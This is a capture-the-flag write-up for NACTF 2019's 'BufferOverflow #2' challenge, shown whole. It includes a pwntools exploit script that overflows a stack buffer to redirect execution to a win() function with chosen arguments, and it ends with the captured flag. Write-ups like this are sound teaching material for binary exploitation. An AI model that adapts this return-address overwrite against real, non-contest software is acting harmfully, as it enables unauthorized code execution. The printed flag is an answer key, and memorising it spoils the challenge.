BufferOverflow #2
Binary Exploitation - Points: 200
The close cousin of a website for “Question marked as duplicate” - part 3!
Can you control the arguments to
win()and get the flag?Connect at
shell.2019.nactf.com:31475
Jump to the win function and pass the correct arguments. Note that the first one is of type long long and the second one of type int.
Exploit script:
from pwn import *
# p = process('bufover-2')
p = remote('ingress.cluster.nactf.com', 31184)
win = '\xc2\x91\x04\x08' # 0x80491c2
arg1 = '\x55\xda\xb4\x14' # 0x14B4DA55
arg2 = '\xbe\xb4\x0d\xf0' # 0xF00DB4BE
print p.recv()
p.sendline('A'*28+win+'AAAA'+arg1+'\x00\x00\x00\x00'+arg2)
print p.recvall()
flag: nactf{PwN_th3_4rG5_T0o_Ky3v7Ddg}